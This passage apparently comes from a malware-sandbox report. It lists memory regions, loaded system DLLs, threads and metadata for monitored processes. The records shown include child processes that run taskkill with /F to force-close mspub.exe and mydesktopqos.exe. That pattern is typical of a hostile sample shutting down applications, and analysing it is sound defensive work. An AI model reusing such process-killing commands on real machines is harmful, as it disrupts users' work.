0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1413 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1414 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1415 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1416 start_va = 0x7fefd560000 end_va = 0x7fefd59cfff entry_point = 0x7fefd560000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1417 start_va = 0x7fefd5a0000 end_va = 0x7fefd5b3fff entry_point = 0x7fefd5a0000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1418 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1419 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1420 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1421 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1422 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1423 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1424 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1425 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1426 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1427 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1428 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1429 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1430 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1431 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1432 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1433 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1434 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1435 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1436 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Thread: id = 99 os_tid = 0xb14 Thread: id = 123 os_tid = 0xbe0 Thread: id = 128 os_tid = 0x540 Thread: id = 135 os_tid = 0x404 Thread: id = 136 os_tid = 0x548 Process: id = "14" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x187b000" os_pid = "0xb4c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM mspub.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 929 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 930 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 931 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 932 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 933 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 934 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 935 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 936 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 937 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 938 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 939 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 940 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 941 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 942 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 943 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1247 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1248 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1249 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1250 start_va = 0xc0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 1251 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1252 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1253 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x1e0000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1254 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1255 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1256 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1257 start_va = 0x2a0000 end_va = 0x2a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 1258 start_va = 0x2e0000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 1259 start_va = 0x500000 end_va = 0x687fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 1260 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1261 start_va = 0x6c0000 end_va = 0x840fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1262 start_va = 0x850000 end_va = 0x1c4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000850000" filename = "" Region: id = 1263 start_va = 0x1c50000 end_va = 0x1d0ffff entry_point = 0x1c50000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1264 start_va = 0x1e80000 end_va = 0x1efffff entry_point = 0x0 region_type = private name = "private_0x0000000001e80000" filename = "" Region: id = 1265 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1266 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1267 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1268 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1269 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1270 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1271 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1272 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1273 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1274 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1275 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1276 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1277 start_va = 0x7fefd450000 end_va = 0x7fefd45afff entry_point = 0x7fefd450000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1278 start_va = 0x7fefd480000 end_va = 0x7fefd4a4fff entry_point = 0x7fefd480000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1279 start_va = 0x7fefd4b0000 end_va = 0x7fefd4befff entry_point = 0x7fefd4b0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1280 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1281 start_va = 0x7fefdbb0000 end_va = 0x7fefdc86fff entry_point = 0x7fefdbb0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1282 start_va = 0x7fefdc90000 end_va = 0x7fefdcf6fff entry_point = 0x7fefdc90000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1283 start_va = 0x7fefdd00000 end_va = 0x7fefddc8fff entry_point = 0x7fefdd00000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1284 start_va = 0x7fefddf0000 end_va = 0x7fefdff2fff entry_point = 0x7fefddf0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1285 start_va = 0x7fefe000000 end_va = 0x7fefe098fff entry_point = 0x7fefe000000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1286 start_va = 0x7fefe0a0000 end_va = 0x7fefe1a8fff entry_point = 0x7fefe0a0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1287 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1288 start_va = 0x7fefe350000 end_va = 0x7fefe35dfff entry_point = 0x7fefe350000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1289 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1290 start_va = 0x7feff2e0000 end_va = 0x7feff350fff entry_point = 0x7feff2e0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1291 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1292 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1293 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1294 start_va = 0x7feff950000 end_va = 0x7feff97dfff entry_point = 0x7feff950000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1295 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Thread: id = 105 os_tid = 0xb50 Thread: id = 126 os_tid = 0xbfc Thread: id = 129 os_tid = 0xc4 Thread: id = 139 os_tid = 0x80c Thread: id = 140 os_tid = 0x544 Process: id = "15" image_name = "taskkill.exe" filename = "c:\\windows\\system32\\taskkill.exe" page_root = "0x179a000" os_pid = "0xb64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\taskkill.exe\" /IM mydesktopqos.exe /F" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 944 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 945 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 946 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 947 start_va = 0x90000 end_va = 0x10ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 948 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 949 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 950 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 951 start_va = 0xff6c0000 end_va = 0xff6defff entry_point = 0xff6c0000 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\System32\\taskkill.exe" (normalized: "c:\\windows\\system32\\taskkill.exe") Region: id = 952 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 953 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 954 start_va = 0x7fffffd6000 end_va = 0x7fffffd6fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 955 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 956 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 957 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 958 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1452 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1453 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 1454 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1455 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1456 start_va = 0x70000 end_va = 0x73fff entry_point = 0x70000 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\System32\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\taskkill.exe.mui") Region: id = 1457 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1458 start_va = 0x110000 end_va = 0x176fff entry_point = 0x110000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1459 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 1460 start_va = 0x380000 end_va = 0x380fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1461 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 1462 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 1463 start_va = 0x3d0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1464 start_va = 0x3e0000 end_va = 0x567fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 1465 start_va = 0x570000 end_va = 0x6f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1466 start_va = 0x700000 end_va = 0x1afffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1467 start_va = 0x1b00000 end_va = 0x1bbffff entry_point = 0x1b00000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 1468 start_va = 0x1bc0000 end_va = 0x1c04fff entry_point = 0x1bc0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1469 start_va = 0x1c20000 end_va = 0x1c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 1470 start_va = 0x1d20000 end_va = 0x1d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d20000" filename = "" Region: id = 1471 start_va = 0x1ef0000 end_va = 0x1f6ffff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 1472 start_va = 0x1f70000 end_va = 0x223efff entry_point = 0x1f70000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1473 start_va = 0x22f0000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 1474 start_va = 0x77450000 end_va = 0x77549fff entry_point = 0x77450000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1475 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1476 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1477 start_va = 0x7fef4590000 end_va = 0x7fef46b4fff entry_point = 0x7fef4590000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" (normalized: "c:\\windows\\system32\\dbghelp.dll") Region: id = 1478 start_va = 0x7fef7320000 end_va = 0x7fef732efff entry_point = 0x7fef7320000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1479 start_va = 0x7fef7490000 end_va = 0x7fef7515fff entry_point = 0x7fef7490000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 1480 start_va = 0x7fef8c90000 end_va = 0x7fef8cdbfff entry_point = 0x7fef8c90000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1481 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1482 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1483 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1484 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1485 start_va = 0x7fefb940000 end_va = 0x7fefb950fff entry_point = 0x7fefb940000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1486 start_va = 0x7fefc780000 end_va = 0x7fefc78bfff entry_point = 0x7fefc780000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1487 start_va = 